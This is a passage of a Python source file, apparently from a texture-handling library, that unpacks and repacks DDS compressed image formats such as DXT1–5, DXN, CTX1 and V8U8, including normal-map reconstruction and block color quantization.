a_scale, r_scale, g_scale, b_scale = upscales[: 4]
dds_defs_ext.unpack_ctx1(
unpacked, packed, a_scale, r_scale, g_scale, b_scale,
pixels_per_texel, ucc, array("b", chan_map[: 4]))
else:
#create the arrays to hold the color channel data
c_0 = [0,0,0,0]
c_1 = [0,0,0,0]
c_2 = [0,0,0,0]
c_3 = [0,0,0,0]
#stores the colors in a way we can easily access them
colors = [c_0, c_1, c_2, c_3]
# convert to tuples for faster access
upscales = tuple(tuple(scale) for scale in upscales)
#loop through each texel
for i in range(len(packed)//2):
j = i*2
pxl_i = i*channels_per_texel
values = packed[j]
idx = packed[j+1]
# unpack the colors
c_0[1] = x0 = r0 = (values) & 255
c_0[2] = y0 = g0 = (values>>8) & 255
c_1[1] = x1 = r1 = (values>>16) & 255
c_1[2] = y1 = g1 = (values>>24) & 255
#calculate the z-components
# we're normalizing the coordinates here, not just unpacking them
x0 = x0&mask if x0&sign_mask else zero_point - x0
y0 = y0&mask if y0&sign_mask else zero_point - y0
x1 = x1&mask if x1&sign_mask else zero_point - x1
y1 = y1&mask if y1&sign_mask else zero_point - y1
d = mask_sq - x0**2 - y0**2
if d > 0:
b0 = int(sqrt(d)) + zero_point
else:
b0 = zero_point
n_len = sqrt(mask_sq - d)/mask
x0 = int(x0/n_len)
y0 = int(y0/n_len)
r0 = x0 + zero_point if r0&sign_mask else zero_point - x0
g0 = y0 + zero_point if g0&sign_mask else zero_point - y0
d = mask_sq - x1**2 - y1**2
if d > 0:
b1 = int(sqrt(d)) + zero_point
else:
b1 = zero_point
n_len = sqrt(mask_sq - d)/mask
x1 = int(x1/n_len)
y1 = int(y1/n_len)
r1 = x1 + zero_point if r1&sign_mask else zero_point - x1
g1 = y1 + zero_point if g1&sign_mask else zero_point - y1
# store the normalized colors
c_0[1] = r0; c_1[1] = r1
c_0[2] = g0; c_1[2] = g1
c_0[3] = b0; c_1[3] = b1
# calculate the in-between colors
c_2[1] = (c_0[1]*2 + c_1[1])//3
c_2[2] = (c_0[2]*2 + c_1[2])//3
c_2[3] = (c_0[3]*2 + c_1[3])//3
c_3[1] = (c_0[1] + c_1[1]*2)//3
c_3[2] = (c_0[2] + c_1[2]*2)//3
c_3[3] = (c_0[3] + c_1[3]*2)//3
for k in pixel_indices:
color = colors[(idx >> (k*2))&3]
off = k*ucc + pxl_i
dst_chan = 0
for src_chan in chan_map:
if src_chan <= 0 or dst_chan == 0:
# set alpha to full white
unpacked[off + dst_chan] = unpack_max
elif src_chan >= 0:
unpacked[off + dst_chan] = upscales[dst_chan][color[src_chan]]
dst_chan += 1
return unswizzle_dxt(unpacked, width, height * depth, ucc)
def unpack_v8u8(arby, bitmap_index, width, height, depth=1):
return unpack_vu(arby, bitmap_index, width, height, depth, 8)
def unpack_v16u16(arby, bitmap_index, width, height, depth=1):
return unpack_vu(arby, bitmap_index, width, height, depth, 16)
def unpack_vu(arby, bitmap_index, width, height, depth=1, bpc=8):
packed = arby.texture_block[bitmap_index]
#create a new array to hold the pixels after we unpack them
unpack_code = arby._UNPACK_ARRAY_CODE
unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
unpack_max = (1<<(unpack_size*8)) - 1
ucc = arby.unpacked_channel_count
bytes_per_pixel = unpack_size*ucc
unpacked = ab.bitmap_io.make_array(
unpack_code, width*height, bytes_per_pixel)
upscales = list(arby.channel_upscalers)
chan_map = list(arby.channel_mapping)
while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
while len(chan_map) < 4: chan_map.append(-1)
if fast_dds_defs:
a_scale, r_scale, g_scale, b_scale = upscales[: 4]
dds_defs_ext.unpack_vu(
unpacked, packed, a_scale, r_scale, g_scale, b_scale,
ucc, array("b", chan_map[: 4]))
return unpacked
sign_mask = 1 << (bpc - 1) # == 128 for 8bpc
chan_mask = (1 << bpc) - 1 # == 255 for 8bpc
dist_max = (sign_mask - 1) # == 127 for 8bpc
dist_max_sq = dist_max**2 # == 16129 for 8bpc
# convert to tuples for faster access
upscales = tuple(tuple(scale) for scale in upscales)
for i in range(0, len(packed)):
# RGB normal maps use unsigned chars, which maps to:
# [0, 255] -> [-1, 1]
# V8U8 uses signed chars, which maps(as unsigned chars) to:
# [0, 127] -> [+0, 1] and [128, 255] -> [-1, -0]
# Ones compliment is used here to simplify math and to allow
# all components to have a zero point and to make both sides
# of the zero point have an equal numbers of points.
off = ucc*i
u = packed[i]&chan_mask
v = (packed[i]>>bpc)&chan_mask
if u&sign_mask: u -= chan_mask
if v&sign_mask: v -= chan_mask
# we're normalizing the coordinates here, not just unpacking them
d = dist_max_sq - u**2 - v**2
if d > 0:
w = int(sqrt(d))
else:
n_len = sqrt(dist_max_sq - d)/dist_max
u = int(u/n_len)
v = int(v/n_len)
w = 0
colors = [0, u + sign_mask, v + sign_mask, w + sign_mask]
dst_chan = 0
for src_chan in chan_map:
if src_chan < 0 and dst_chan == 0:
# alpha and not reading alpha. set to full white
unpacked[off] = unpack_max
elif src_chan >= 0:
unpacked[off + dst_chan] = upscales[dst_chan][colors[src_chan]]
dst_chan += 1
return unpacked
def unpack_r8g8(arby, bitmap_index, width, height, depth=1):
return unpack_rg(arby, bitmap_index, width, height, depth, 8)
def unpack_r16g16(arby, bitmap_index, width, height, depth=1):
return unpack_rg(arby, bitmap_index, width, height, depth, 16)
def unpack_rg(arby, bitmap_index, width, height, depth=1, bpc=8):
packed = arby.texture_block[bitmap_index]
#create a new array to hold the pixels after we unpack them
unpack_code = arby._UNPACK_ARRAY_CODE
unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
unpack_max = (1<<(unpack_size*8)) - 1
ucc = arby.unpacked_channel_count
bytes_per_pixel = unpack_size*ucc
unpacked = ab.bitmap_io.make_array(
unpack_code, width*height, bytes_per_pixel)
upscales = list(arby.channel_upscalers)
chan_map = list(arby.channel_mapping)
while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
while len(chan_map) < 4: chan_map.append(-1)
if False and fast_dds_defs:
# NOT IMPLEMENTED YET
a_scale, r_scale, g_scale, b_scale = upscales[: 4]
dds_defs_ext.unpack_gr(
unpacked, packed, a_scale, r_scale, g_scale, b_scale,
ucc, array("b", chan_map[: 4]))
return unpacked
sign_mask = 1 << (bpc - 1) # == 128 for 8bpc
chan_mask = (1 << bpc) - 1 # == 255 for 8bpc
dist_max = (sign_mask - 1) # == 127 for 8bpc
dist_max_sq = dist_max**2 # == 16129 for 8bpc
# convert to tuples for faster access
upscales = tuple(tuple(scale) for scale in upscales)
for i in range(0, len(packed)):
off = ucc*i
u = ((packed[i]>>bpc)&chan_mask) - dist_max
v = (packed[i]&chan_mask) - dist_max
if u < 0: u += 1
if v < 0: v += 1
# we're normalizing the coordinates here, not just unpacking them
d = dist_max_sq - u**2 - v**2
if d > 0:
w = int(sqrt(d))
else:
n_len = sqrt(dist_max_sq - d)/dist_max
u = int(u/n_len)
v = int(v/n_len)
w = 0
colors = [0, u + sign_mask, v + sign_mask, w + sign_mask]
dst_chan = 0
for src_chan in chan_map:
if src_chan < 0 and dst_chan == 0:
# alpha and not reading alpha. set to full white
unpacked[off] = unpack_max
elif src_chan >= 0:
unpacked[off + dst_chan] = upscales[dst_chan][colors[src_chan]]
dst_chan += 1
return unpacked
def unpack_g8b8(arby, bitmap_index, width, height, depth=1):
return unpack_gb(arby, bitmap_index, width, height, depth, 8)
def unpack_g16b16(arby, bitmap_index, width, height, depth=1):
return unpack_gb(arby, bitmap_index, width, height, depth, 16)
def unpack_gb(arby, bitmap_index, width, height, depth=1, bpc=8):
packed = arby.texture_block[bitmap_index]
#create a new array to hold the pixels after we unpack them
unpack_code = arby._UNPACK_ARRAY_CODE
unpack_size = ab.PIXEL_ENCODING_SIZES[unpack_code]
unpack_max = (1<<(unpack_size*8)) - 1
ucc = arby.unpacked_channel_count
bytes_per_pixel = unpack_size*ucc
unpacked = ab.bitmap_io.make_array(
unpack_code, width*height, bytes_per_pixel)
upscales = list(arby.channel_upscalers)
chan_map = list(arby.channel_mapping)
while len(upscales) < 4: upscales.append(array(upscales[0].typecode, [0]))
while len(chan_map) < 4: chan_map.append(-1)
if False and fast_dds_defs:
# NOT IMPLEMENTED YET
a_scale, r_scale, g_scale, b_scale = upscales[: 4]
dds_defs_ext.unpack_gb(
unpacked, packed, a_scale, r_scale, g_scale, b_scale,
ucc, array("b", chan_map[: 4]))
return unpacked
sign_mask = 1 << (bpc - 1) # == 128 for 8bpc
chan_mask = (1 << bpc) - 1 # == 255 for 8bpc
dist_max = (sign_mask - 1) # == 127 for 8bpc
dist_max_sq = dist_max**2 # == 16129 for 8bpc
# convert to tuples for faster access
upscales = tuple(tuple(scale) for scale in upscales)
for i in range(0, len(packed)):
off = ucc*i
v = ((packed[i]>>bpc)&chan_mask) - dist_max
w = (packed[i]&chan_mask) - dist_max
if v < 0: v += 1
if w < 0: w += 1
# we're normalizing the coordinates here, not just unpacking them
d = dist_max_sq - v**2 - w**2
if d > 0:
u = int(sqrt(d))
else:
n_len = sqrt(dist_max_sq - d)/dist_max
v = int(v/n_len)
w = int(w/n_len)
u = 0
colors = [0, u + sign_mask, v + sign_mask, w + sign_mask]
dst_chan = 0
for src_chan in chan_map:
if src_chan < 0 and dst_chan == 0:
# alpha and not reading alpha. set to full white
unpacked[off] = unpack_max
elif src_chan >= 0:
unpacked[off + dst_chan] = upscales[dst_chan][colors[src_chan]]
dst_chan += 1
return unpacked
########################################
'''######## PACKING ROUTINES ########'''
########################################
def pack_dxt1(arby, unpacked, width, height, depth=1):
ucc, bpt = arby.unpacked_channel_count, 8
width, height, depth = ab.clip_dimensions(width, height, depth)
dxt_width, dxt_height = clip_dxt_dimensions(width, height)
texel_width, texel_height, _ = ab.clip_dimensions(dxt_width//4, dxt_height//4)
pixels_per_texel = get_texel_pixel_count(width, height)
channels_per_texel = ucc*pixels_per_texel
can_have_alpha = arby.color_key_transparency
a_cutoff = arby.one_bit_bias
_, r_scale, g_scale, b_scale = arby.channel_downscalers
repacked = ab.bitmap_io.make_array("I", texel_width*texel_height, bpt)
unpacked = swizzle_dxt(unpacked, width, height * depth, ucc)
if fast_dds_defs:
dds_defs_ext.pack_dxt1(
repacked, unpacked, r_scale, g_scale, b_scale,
pixels_per_texel, can_have_alpha, a_cutoff)
return repacked
#this is the indexing for each pixel in each texel
#values are multiplied by 4 to account for the channels
pixel_indices = range(0, channels_per_texel, ucc)
make_alpha = False
c_2 = [0,0,0,0]
c_3 = [0,0,0,0]
#shorthand names
rpa = repacked
upa = unpacked
# convert to tuples for faster access
r_scale, g_scale, b_scale = tuple(r_scale), tuple(g_scale), tuple(b_scale)
#loop for each texel
for txl_i in range(0, len(repacked), 2):
dist0 = dist1 = c_0i = c_1i = idx = 0
pxl_i = (txl_i//2)*channels_per_texel
r_pxl_i = pxl_i + 1
g_pxl_i = pxl_i + 2
b_pxl_i = pxl_i + 3
# compare distance between all pixels and find the two furthest apart
# (we are actually comparing the area of the distance as it's faster)
for i in pixel_indices:
r = upa[r_pxl_i + i]
g = upa[g_pxl_i + i]
b = upa[b_pxl_i + i]
for j in pixel_indices:
if j <= i: continue
dist1 = ((r - upa[r_pxl_i + j])**2+
(g - upa[g_pxl_i + j])**2+
(b - upa[b_pxl_i + j])**2)
if dist1 > dist0:
dist0 = dist1
c_0i = i
c_1i = j
# store furthest apart colors for use
c_0 = upa[pxl_i + c_0i: pxl_i + c_0i + 4]
c_1 = upa[pxl_i + c_1i: pxl_i + c_1i + 4]
# quantize the colors down to 16 bit color and repack
color0 = ((((r_scale[c_0[1]]*31+15)//255)<<11) |
(((g_scale[c_0[2]]*63+31)//255)<<5) |
(b_scale[c_0[3]]*31+15)//255)
color1 = ((((r_scale[c_1[1]]*31+15)//255)<<11) |
(((g_scale[c_1[2]]*63+31)//255)<<5) |
(b_scale[c_1[3]]*31+15)//255)
# figure out if we are using color key transparency for this pixel
#by seeing if any of the alpha values are below the cutoff bias
if can_have_alpha:
make_alpha = False
for i in pixel_indices:
if upa[pxl_i+i] < a_cutoff:
make_alpha = True
break
if color0 == color1 and not make_alpha:
rpa[txl_i] = (color1<<16) | color0
continue
# if the current color selection doesn't match what we want then
# we reverse which color is which (if we are using transparency then
# the first color as an integer must be smaller or equal to the second)
if make_alpha == (color0 > color1):
c_0, c_1 = c_1, c_0
rpa[txl_i] = (color0<<16) | color1
else:
rpa[txl_i] = (color1<<16) | color0
# calculate the intermediate colors
#If the target format is DXT2/3/4/5 then no CK transparency is used.
#CK mode will only be selected if both colors are the same.
#If both colors are the same then it is fine to run non-CK
#calculation on it since it will default to index zero.
#That is why the DXT3/5 calculation is in this part only
if rpa[txl_i]&65535 > rpa[txl_i]>>16:
c_2[1] = (c_0[1]*2 + c_1[1])//3
c_2[2] = (c_0[2]*2 + c_1[2])//3
c_2[3] = (c_0[3]*2 + c_1[3])//3
c_3[1] = (c_0[1] + c_1[1]*2)//3
c_3[2] = (c_0[2] + c_1[2]*2)//3
c_3[3] = (c_0[3] + c_1[3]*2)//3
# calculate each pixel's closest match
# and assign it the proper index
for i in pixel_indices:
r = upa[r_pxl_i+i]
g = upa[g_pxl_i+i]
b = upa[b_pxl_i+i]
dists = ((r-c_0[1])**2 + (g-c_0[2])**2 + (b-c_0[3])**2,
(r-c_1[1])**2 + (g-c_1[2])**2 + (b-c_1[3])**2,
(r-c_2[1])**2 + (g-c_2[2])**2 + (b-c_2[3])**2,
(r-c_3[1])**2 + (g-c_3[2])**2 + (b-c_3[3])**2)
idx += dists.index(min(dists))<<(i>>1)
rpa[txl_i+1] = idx
continue
c_2[1] = (c_0[1]+c_1[1])//2
c_2[2] = (c_0[2]+c_1[2])//2
c_2[3] = (c_0[3]+c_1[3])//2
#here, c_3 represents zero color and fully transparent
#calculate each pixel's closest match and assign it the proper index
for i in pixel_indices:
if upa[pxl_i+i] < a_cutoff:
idx += 3<<(i>>1)
continue
r = upa[r_pxl_i+i]
g = upa[g_pxl_i+i]
b = upa[b_pxl_i+i]
dists = ((r-c_0[1])**2 + (g-c_0[2])**2 + (b-c_0[3])**2,
(r-c_1[1])**2 + (g-c_1[2])**2 + (b-c_1[3])**2,
(r-c_2[1])**2 + (g-c_2[2])**2 + (b-c_2[3])**2)
idx += dists.index(min(dists))<<(i>>1)
rpa[txl_i+1] = idx
return repacked
def pack_dxt2_3(arby, unpacked, width, height, depth=1):
ucc, bpt = arby.unpacked_channel_count, 16
ucc = arby.unpacked_channel_count
width, height, depth = ab.clip_dimensions(width, height, depth)
dxt_width, dxt_height = clip_dxt_dimensions(width, height)
texel_width, texel_height, _ = ab.clip_dimensions(dxt_width//4, dxt_height//4)
pixels_per_texel = get_texel_pixel_count(width, height)
channels_per_texel = ucc*pixels_per_texel
a_scale, r_scale, g_scale, b_scale = arby.channel_downscalers
repacked = ab.bitmap_io.make_array("I", texel_width*texel_height, bpt)
unpacked = swizzle_dxt(unpacked, width, height * depth, ucc)
if fast_dds_defs:
dds_defs_ext.pack_dxt2_3(
repacked, unpacked,
a_scale, r_scale, g_scale, b_scale, pixels_per_texel)
return repacked
# convert to tuples for faster access
a_scale, r_scale, g_scale, b_scale = tuple(a_scale), tuple(r_scale),\
tuple(g_scale), tuple(b_scale)
#this is the indexing for each pixel in each texel
#values are multiplied by 4 to account for the channels
pixel_indices = range(0, channels_per_texel, ucc)
c_2 = [0,0,0,0]
c_3 = [0,0,0,0]
#shorthand names
rpa = repacked
upa = unpacked
#loop for each texel
for txl_i in range(0, len(repacked), 4):
dist0 = dist1 = c_0i = c_1i = 0
pxl_i = (txl_i//4)*channels_per_texel
r_pxl_i = pxl_i + 1
g_pxl_i = pxl_i + 2
b_pxl_i = pxl_i + 3
'''CALCULATE THE ALPHA'''
# calculate alpha channel for DXT 2/3
# coincidentally, the number of channels(4) matches the number of
# bits in the alpha(4), so the shift is the same as the channel index
alpha = sum(((a_scale[upa[pxl_i+i]]*15 + 7)//255) << i
for i in pixel_indices)
rpa[txl_i] = alpha&0xFFffFFff
rpa[txl_i+1] = alpha>>32
# CALCULATE THE COLORS
# compare distance between all pixels and find the two furthest apart
# (we are actually comparing the area of the distance as it's faster)
for i in pixel_indices:
r = upa[i + r_pxl_i]
g = upa[i + g_pxl_i]
b = upa[i + b_pxl_i]
for j in pixel_indices:
if j <= i: continue
dist1 = ((r - upa[r_pxl_i + j])**2+
(g - upa[g_pxl_i + j])**2+
(b - upa[b_pxl_i + j])**2)
if dist1 > dist0:
dist0 = dist1
c_0i = i
c_1i = j
# store furthest apart colors for use
c_0 = upa[pxl_i + c_0i: pxl_i + c_0i + 4]
c_1 = upa[pxl_i + c_1i: pxl_i + c_1i + 4]
# quantize the colors down to 16 bit color and repack
color0 = ((((r_scale[c_0[1]]*31+15)//255)<<11) |
(((g_scale[c_0[2]]*63+31)//255)<<5) |
(b_scale[c_0[3]]*31+15)//255)
color1 = ((((r_scale[c_1[1]]*31+15)//255)<<11) |
(((g_scale[c_1[2]]*63+31)//255)<<5) |
(b_scale[c_1[3]]*31+15)//255)
if color0 != color1:
# if the current color selection doesn't match what
# we want then we reverse which color is which
if color0 < color1:
c_0, c_1 = c_1, c_0
color0, color1 = color1, color0
idx = 0
c_2[1] = (c_0[1]*2 + c_1[1])//3
c_2[2] = (c_0[2]*2 + c_1[2])//3
c_2[3] = (c_0[3]*2 + c_1[3])//3
c_3[1] = (c_0[1] + c_1[1]*2)//3
c_3[2] = (c_0[2] + c_1[2]*2)//3
c_3[3] = (c_0[3] + c_1[3]*2)//3
# calculate each pixel's closest match
# and assign it the proper index
for i in pixel_indices:
r = upa[r_pxl_i+i]
g = upa[g_pxl_i+i]
b = upa[b_pxl_i+i]
dists = ((r-c_0[1])**2 + (g-c_0[2])**2 + (b-c_0[3])**2,
(r-c_1[1])**2 + (g-c_1[2])**2 + (b-c_1[3])**2,
(r-c_2[1])**2 + (g-c_2[2])**2 + (b-c_2[3])**2,
(r-c_3[1])**2 + (g-c_3[2])**2 + (b-c_3[3])**2)
idx += dists.index(min(dists))<<(i>>1)
rpa[txl_i+3] = idx
rpa[txl_i+2] = (color1<<16) | color0
return repacked
def pack_dxt4_5(arby, unpacked, width, height, depth=1):
ucc, bpt = arby.unpacked_channel_count, 16
ucc = arby.unpacked_channel_count
width, height, depth = ab.clip_dimensions(width, height, depth)
dxt_width, dxt_height = clip_dxt_dimensions(width, height)
texel_width, texel_height, _ = ab.clip_dimensions(dxt_width//4, dxt_height//4)
pixels_per_texel = get_texel_pixel_count(width, height)
channels_per_texel = ucc*pixels_per_texel
a_scale, r_scale, g_scale, b_scale = arby.channel_downscalers
repacked = ab.bitmap_io.make_array("I", texel_width*texel_height, bpt)
unpacked = swizzle_dxt(unpacked, width, height * depth, ucc)
if fast_dds_defs:
dds_defs_ext.pack_dxt4_5(
repacked, unpacked, a_scale, r_scale, g_scale, b_scale,
pixels_per_texel)
return repacked
# convert to tuples for faster access
a_scale, r_scale, g_scale, b_scale = tuple(a_scale), tuple(r_scale),\
tuple(g_scale), tuple(b_scale)
#this is the indexing for each pixel in each texel
#values are multiplied by 4 to account for the channels
pixel_indices = range(0, channels_per_texel, ucc)
c_0 = [0,0,0,0]
c_1 = [0,0,0,0]
c_2 = [0,0,0,0]
c_3 = [0,0,0,0]
#shorthand names
rpa = repacked
upa = unpacked
#loop for each texel
for txl_i in range(0, len(repacked), 4):
dist0 = dist1 = c_0i = c_1i = alpha_idx = 0
#cache so it doesn't have to keep being calculated
pxl_i = (txl_i//4)*channels_per_texel
r_pxl_i = pxl_i + 1
g_pxl_i = pxl_i + 2
b_pxl_i = pxl_i + 3
# CALCULATE THE ALPHA
#find the most extreme values
alpha_vals = tuple(map(lambda i: a_scale[upa[pxl_i+i]], pixel_indices))
alpha0 = max(alpha_vals)
alpha1 = min(alpha_vals)
if alpha0 == alpha1:
# if they are the same number then
# the indexing can stay at all zero
pass
elif alpha1 and alpha0 != 255:
# if the most extreme values are NOT 0 or
# 255, use them as the interpolation values
# In this mode, value_0 must be greater than value_1
alpha_dif = alpha0 - alpha1
half_dif = alpha_dif//2
# calculate and store which interpolated
# index each alpha value is closest to
for i in range(len(alpha_vals)):
# 0 = c_0 1 = c_1
# 2 = (6*c_0 + c_1)//7 3 = (5*c_0 + 2*c_1)//7
# 4 = (4*c_0 + 3*c_1)//7 5 = (3*c_0 + 4*c_1)//7
# 6 = (2*c_0 + 5*c_1)//7 7 = (c_0 + 6*c_1)//7
# calculate how far between both colors
# that the value is as a 0 to 7 int
tmp = ((alpha_vals[i] - alpha1)*7 + half_dif)//alpha_dif
if tmp == 0:
alpha_idx |= 1<<(i*3)
elif tmp < 7:
# Because the colors are stored in opposite
# order, we need to invert the index
alpha_idx |= (8-tmp)<<(i*3)
else:
# In this mode, value_0 must be less than or equal to value_1
# if the most extreme values ARE 0 and 255 though, then
# we need to calculate the second most extreme values
alpha0 = 255
alpha1 = 0
for val in alpha_vals:
# store if lowest int so far
if val < alpha0 and val: alpha0 = val
# store if greatest int so far
if val > alpha1 and val != 255: alpha1 = val
if alpha1:
alpha_dif = alpha1 - alpha0
else:
alpha0 = alpha_dif = 0
alpha1 = 255
half_dif = alpha_dif//2
# calculate and store which interpolated
# index each alpha value is closest to
for i in range(len(alpha_vals)):
# there are 4 interpolated colors in this mode
# 0 = c_0 1 = c_1
# 2 = (4*c_0 + c_1)//5 3 = (3*c_0 + 2*c_1)//5
# 4 = (2*c_0 + 3*c_1)//5 5 = (c_0 + 4*c_1)//5
# 6 = 0 7 = 255
comp = alpha_vals[i]
if comp == 0:
# if the value is 0 we set it to index 6
alpha_idx |= 6<<(i*3)
elif comp == 255:
# if the value is 255 we set it to index 7
alpha_idx |= 7<<(i*3)
elif alpha_dif:
# calculate how far between both colors
# that the value is as a 0 to 5 int
tmp = ((comp - alpha0)*5 + half_dif)//alpha_dif
if tmp == 5:
alpha_idx |= 1<<(i*3)
elif tmp > 0:
alpha_idx |= (tmp+1)<<(i*3)
rpa[txl_i] = ((alpha_idx<<16) + (alpha1<<8) + alpha0)&0xFFffFFff
rpa[txl_i+1] = alpha_idx>>16
# CALCULATE THE COLORS
# compare distance between all pixels and find the two furthest apart
# (we are actually comparing the area of the distance as it's faster)
for i in pixel_indices:
r = upa[r_pxl_i + i]
g = upa[g_pxl_i + i]
b = upa[b_pxl_i + i]
for j in pixel_indices:
if j <= i: continue
dist1 = ((r - upa[r_pxl_i + j])**2+
(g - upa[g_pxl_i + j])**2+
(b - upa[b_pxl_i + j])**2)
if dist1 > dist0:
dist0 = dist1
c_0i = i
c_1i = j
# store furthest apart colors for use
c_0 = upa[pxl_i + c_0i: pxl_i + c_0i + 4]
c_1 = upa[pxl_i + c_1i: pxl_i + c_1i + 4]
# quantize the colors down to 16 bit color and repack
color0 = ((((r_scale[c_0[1]]*31+15)//255)<<11) |
(((g_scale[c_0[2]]*63+31)//255)<<5) |
(b_scale[c_0[3]]*31+15)//255)
color1 = ((((r_scale[c_1[1]]*31+15)//255)<<11) |
(((g_scale[c_1[2]]*63+31)//255)<<5) |
(b_scale[c_1[3]]*31+15)//255)
if color0 != color1:
# if the current color selection doesn't match what
# we want then we reverse which color is which
if color0 < color1:
c_0, c_1 = c_1, c_0
color0, color1 = color1, color0
idx = 0
c_2[1] = (c_0[1]*2 + c_1[1])//3
c_2[2] = (c_0[2]*2 + c_1[2])//3
c_2[3] = (c_0[3]*2 + c_1[3])//3
c_3[1] = (c_0[1] + c_1[1]*2)//3
c_3[2] = (c_0[2] + c_1[2]*2)//3
c_3[3] = (c_0[3] + c_1[3]*2)//3
# calculate each pixel's closest match
# and assign it the proper index
for i in pixel_indices:
r = upa[i + r_pxl_i]
g = upa[i + g_pxl_i]
b = upa[i + b_pxl_i]
dists = ((r-c_0[1])**2 + (g-c_0[2])**2 + (b-c_0[3])**2,
(r-c_1[1])**2 + (g-c_1[2])**2 + (b-c_1[3])**2,
(r-c_2[1])**2 + (g-c_2[2])**2 + (b-c_2[3])**2,
(r-c_3[1])**2 + (g-c_3[2])**2 + (b-c_3[3])**2)
idx += dists.index(min(dists))<<(i>>1)
rpa[txl_i+3] = idx
rpa[txl_i+2] = (color1<<16) | color0
return repacked
def pack_dxt3a(arby, unpacked, width, height, depth=1):
width, height, depth = ab.clip_dimensions(width, height, depth)
#this is how many texels wide/tall the texture is
dxt_width, dxt_height = clip_dxt_dimensions(width, height)
texel_width, texel_height, _ = ab.clip_dimensions(dxt_width//4, dxt_height//4)
#create a new array to hold the texels after we repack them
ucc = arby.unpacked_channel_count
assert arby.target_channel_count == ucc
bpt = ucc*8
scales = list(arby.channel_downscalers)
repacked = ab.bitmap_io.make_array("I", texel_width*texel_height, bpt)
unpacked = swizzle_dxt(unpacked, width, height * depth, ucc)
pixels_per_texel = get_texel_pixel_count(width, height)
channels_per_texel = ucc*pixels_per_texel
pixel_indices = range(0, channels_per_texel, ucc)
if False and fast_dds_defs:
# NOT IMPLEMENTED
dds_defs_ext.pack_dxt3a(repacked, unpacked, pixels_per_texel, *scales)
return repacked
#shorthand names
rpa = repacked
upa = unpacked
# convert to tuples for faster access
for i in range(len(scales)):
scales[i] = tuple(scales[i])
#loop for each texel
for txl_i in range(0, len(repacked), 2):
#cache so it doesn't have to keep being calculated
pxl_i = (txl_i//(2*ucc))*channels_per_texel
chan = (txl_i//2)%ucc
scale = scales[chan]
# CALCULATE THE ALPHA
alpha = a_shift = 0
for i in pixel_indices:
alpha |= ((scale[upa[pxl_i + i]]*15 + 7)//255) << a_shift
a_shift += 4
rpa[txl_i] = alpha&0xFFffFFff
rpa[txl_i+1] = alpha>>32
return repacked
def pack_dxt5a(arby, unpacked, width, height, depth=1):
width, height, depth = ab.clip_dimensions(width, height, depth)
#this is how many texels wide/tall the texture is
dxt_width, dxt_height = clip_dxt_dimensions(width, height)
texel_width, texel_height, _ = ab.clip_dimensions(dxt_width//4, dxt_height//4)
#create a new array to hold the texels after we repack them
ucc = arby.unpacked_channel_count
assert arby.target_channel_count == ucc
bpt = ucc*8
scales = list(arby.channel_downscalers)
repacked = ab.bitmap_io.make_array("I", texel_width*texel_height, bpt)
unpacked = swizzle_dxt(unpacked, width, height * depth, ucc)
pixels_per_texel = get_texel_pixel_count(width, height)
channels_per_texel = ucc*pixels_per_texel
pixel_indices = range(0, channels_per_texel, ucc)
if False and fast_dds_defs:
# NOT IMPLEMENTED
dds_defs_ext.pack_dxt5a(repacked, unpacked, pixels_per_texel, *scales)
return repacked
#shorthand names
rpa = repacked
upa = unpacked
# convert to tuples for faster access
for i in range(len(scales)):
scales[i] = tuple(scales[i])
#loop for each texel
for txl_i in range(0, len(repacked), 2):
#cache so it doesn't have to keep being calculated
pxl_i = (txl_i//(2*ucc))*channels_per_texel
chan = (txl_i//2)%ucc
idx = 0
scale = scales[chan]
vals = tuple(map(lambda i: scale[upa[pxl_i+i+chan]], pixel_indices))
val0 = max(vals)
val1 = min(vals)
if val0 == val1:
# if they are the same number then
# the indexing can stay at all zero
pass
elif val1 and val0 != 255:
# if the most extreme values are NOT 0 or
# 255, use them as the interpolation values
# In this mode, value_0 must be greater than value_1
dif = val0 - val1
half_dif = dif//2
# calculate and store which interpolated
# index each value is closest to
for i in range(len(vals)):
# 0 = c_0 1 = c_1
# 2 = (6*c_0 + c_1)//7 3 = (5*c_0 + 2*c_1)//7
# 4 = (4*c_0 + 3*c_1)//7 5 = (3*c_0 + 4*c_1)//7
# 6 = (2*c_0 + 5*c_1)//7 7 = (c_0 + 6*c_1)//7
# calculate how far between both colors
# that the value is as a 0 to 7 int
tmp = ((vals[i] - val1)*7 + half_dif)//dif
if tmp == 0:
idx |= 1<<(i*3)
elif tmp < 7:
# Because the colors are stored in opposite
# order, we need to invert the index
idx |= (8-tmp)<<(i*3)
else:
# In this mode, value_0 must be less than or equal to value_1
# if the most extreme values ARE 0 and 255 though, then
# we need to calculate the second most extreme values
val0 = 255
val1 = 0
for val in vals:
# store if lowest int so far
if val < val0 and val: val0 = val
# store if greatest int so far
if val > val1 and val != 255: val1 = val
if val1:
dif = val1 - val0
else:
val0 = dif = 0
val1 = 255
half_dif = dif//2
# calculate and store which interpolated
# index each value is closest to
for i in range(len(vals)):
# there are 4 interpolated colors in this mode
# 0 = c_0 1 = c_1
# 2 = (4*c_0 + c_1)//5 3 = (3*c_0 + 2*c_1)//5
# 4 = (2*c_0 + 3*c_1)//5 5 = (c_0 + 4*c_1)//5
# 6 = 0 7 = 255
comp = vals[i]
if comp == 0:
# if the value is 0 we set it to index 6
idx |= 6<<(i*3)
elif comp == 255:
# if the value is 255 we set it to index 7
idx |= 7<<(i*3)
elif dif:
# calculate how far between both colors
# that the value is as a 0 to 5 int
tmp = ((comp - val0)*5 + half_dif)//dif
if tmp == 5:
idx |= 1<<(i*3)
elif tmp > 0:
idx |= (tmp+1)<<(i*3)
rpa[txl_i] = ((idx<<16) | (val1<<8) | val0)&0xFFffFFff
rpa[txl_i+1] = idx>>16
return repacked
def pack_dxn(arby, unpacked, width, height, depth=1):
width, height, depth = ab.clip_dimensions(width, height, depth)
dxt_width, dxt_height = clip_dxt_dimensions(width, height)
texel_width, texel_height, _ = ab.clip_dimensions(dxt_width//4, dxt_height//4)
#create a new array to hold the texels after we repack them
bpt = 16
ucc = arby.unpacked_channel_count
scales = list(arby.channel_downscalers)
repacked = ab.bitmap_io.make_array("I", texel_width*texel_height, bpt)
unpacked = swizzle_dxt(unpacked, width, height * depth, ucc)
pixels_per_texel = get_texel_pixel_count(width, height)
channels_per_texel = ucc*pixels_per_texel
pixel_indices = range(0, channels_per_texel, ucc)
if False and fast_dds_defs:
# NOT IMPLEMENTED
dds_defs_ext.pack_dxn(repacked, unpacked, pixels_per_texel, *scales)
return repacked
#shorthand names
rpa = repacked
